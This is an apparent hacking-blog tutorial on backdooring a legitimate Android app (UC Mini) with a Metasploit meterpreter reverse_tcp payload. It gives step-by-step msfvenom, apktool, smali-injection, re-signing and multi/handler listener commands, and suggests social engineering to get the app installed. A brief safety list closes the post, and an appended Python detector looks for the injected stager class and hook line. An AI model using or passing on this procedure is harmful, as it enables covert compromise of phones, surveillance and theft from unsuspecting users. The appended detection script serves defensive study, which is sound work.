Backdooring Android APK | Part 1 | HACK WITH BEN
Why do hackers choose Android?
Android is the world's most popular smartphone OS, and in India alone almost 90% of smartphone users run Android on their devices. Because of Android's fragmentation problem, it has become the first choice of cyber criminals to exploit.
Android users are not very familiar with Android security, which is another point cyber criminals take advantage of: via social engineering they make users install backdoored applications, which results in device compromise, whether it is the Nougat or the Pie version. We will talk about how to backdoor your payload into an original APK (manually).
*Difficulty: Hard*
Pre-Requisites:
- Kali Linux or Parrot OS; you can use any other OS, but I prefer Kali Linux.
- The original APK: I'm using UC Mini.
Steps to generate a meterpreter payload
Step 1: Generate a Payload apk using msfvenom.
If you are not the root user, use sudo to open the Metasploit Framework.
#msfvenom -p android/meterpreter/reverse_tcp LHOST=Your_IP LPORT=Incoming_Port R > Payload.apk
The available payloads are:
- reverse_https
- reverse_http
- reverse_tcp
Step 2: Using APK Tool:
- Copy the downloaded original APK and the payload APK to a folder in the Easy Apk Tool folder.
- Decompile the payload and the original APK:
- #apktool d -f Payload.apk
- #apktool d -f UCMini.apk
- Copy the payload files (smali files) to the UCMini APK folder.
- You will find the payload files in /Payload/smali/com/metasploit/stage/
- Open the UCMini folder, then the smali folder, then the com folder; inside it create a metasploit folder, inside that a stage folder, and paste the payload smali files there.
- Open the UCMini app folder and open the AndroidManifest file using any text editor.
- Now find an activity tag containing:
- <action android:name="android.intent.action.MAIN"/>
- <category android:name="android.intent.category.LAUNCHER"/>
- When you find it, copy its android:name. Then open a new file and paste it there.
- If you replace the dots with backslashes you will find that it is actually the path of the .main.UCMobile file:
- com\UCMobile\main\UCMobile
- Note: the smali file's name is not necessarily StartActivity. Other apps may use some other name for the smali file, like MainActivity.
- Open the UCMobile.smali file with a text editor.
- Now search for:
- ;->onCreate(Landroid/os/Bundle;)V
- When you locate it, paste the following code on the line after it:
- invoke-static {p0},Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
- Save the file.
- We have to give the app all the permissions.
- Next, copy all the uses-permission entries from the payload's AndroidManifest file to the original APK's AndroidManifest file.
- Check that there are no duplicate permissions.
- Save the file.
Step 6: Re-compile the original APK:
- Using apktool:
- #apktool b UCMini
- Now we are going to generate a key, key.jks, with keytool. I'm using key.keystore instead of key.jks, but you can use key.jks.
- For this, type in the terminal:
- keytool -genkey -V -keystore <Path and filename to store> -alias <alias-name> -keyalg RSA -keysize 2048 -validity 1000
- Enter a memorable keystore password (e.g. 123456).
Step 7: Signing the application using jarsigner:
- Enter in the terminal:
- jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore <our keystore path> UCMini.apk <alias-name>
- Enter the keystore password.
Step 8: Transfer the app and exploit:
Start Metasploit and type the following commands in the terminal:
- msfconsole
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set lhost <Your_IP>
- set lport <Your_Port>
- exploit
(If you have any doubts or errors, just let me know in the comment box.)
STAY SAFE
- Always use the Google Play Store for installing Android applications.
- Never download and install any application from an unknown source.
- Always check the permissions an application requests while installing it on an Android phone.
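A detection-side check, added here as an example and not part of the original post: it looks for the two artefacts the Step 2 edits leave behind, the com/metasploit/stage/Payload class descriptor in a compiled classes.dex and the invoke-static hook placed after onCreate in decompiled smali. The APK and smali samples are constructed stand-ins (the "dex" content is not a real dex file) and the function names are my own.

```python
import io
import re
import zipfile
from pathlib import Path

# Indicators taken from the injection described in the post: the stager class
# directory copied into the app and the invoke-static line added after onCreate.
STAGER_CLASS = b"Lcom/metasploit/stage/Payload;"
INJECTED_CALL = re.compile(
    r"invoke-static\s*\{[^}]*\},\s*Lcom/metasploit/stage/Payload;->start\(Landroid/content/Context;\)V"
)

def scan_apk_bytes(apk_bytes: bytes) -> list[str]:
    """Return the names of dex entries inside an APK that reference the stager class."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for name in apk.namelist():
            # The injected smali compiles into one of the classes*.dex files, where
            # the class descriptor appears verbatim in the dex string table.
            if re.fullmatch(r"classes\d*\.dex", name) and STAGER_CLASS in apk.read(name):
                hits.append(name)
    return hits

def scan_smali_text(smali: str) -> bool:
    """True if decompiled smali contains the onCreate hook the post adds."""
    return INJECTED_CALL.search(smali) is not None

def scan_smali_dir(root: Path) -> list[Path]:
    """Walk an apktool output directory and list every smali file carrying the hook."""
    return [p for p in root.rglob("*.smali") if scan_smali_text(p.read_text(errors="ignore"))]

def build_sample_apk(dex_payload: bytes) -> bytes:
    """Constructed stand-in for an APK: a zip with one classes.dex (not a real dex)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", "<manifest/>")
        z.writestr("classes.dex", dex_payload)
    return buf.getvalue()

# Constructed samples: one clean, one carrying the stager descriptor.
CLEAN_APK = build_sample_apk(b"dex\n035\x00" + b"Lcom/UCMobile/main/UCMobile;")
TROJANED_APK = build_sample_apk(b"dex\n035\x00" + STAGER_CLASS + b"Lcom/UCMobile/main/UCMobile;")

# Constructed smali fragment showing the exact line the post inserts after onCreate.
INJECTED_SMALI = """.method protected onCreate(Landroid/os/Bundle;)V
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    return-void
.end method
"""

if __name__ == "__main__":
    print("trojaned:", scan_apk_bytes(TROJANED_APK))       # ['classes.dex']
    print("clean:", scan_apk_bytes(CLEAN_APK))             # []
    print("smali hook:", scan_smali_text(INJECTED_SMALI))  # True
```

Descriptor matching is a cheap first pass over an installed APK; pair it with the manifest permission review the post's closing advice recommends, since the merged uses-permission list is the other visible trace of this modification.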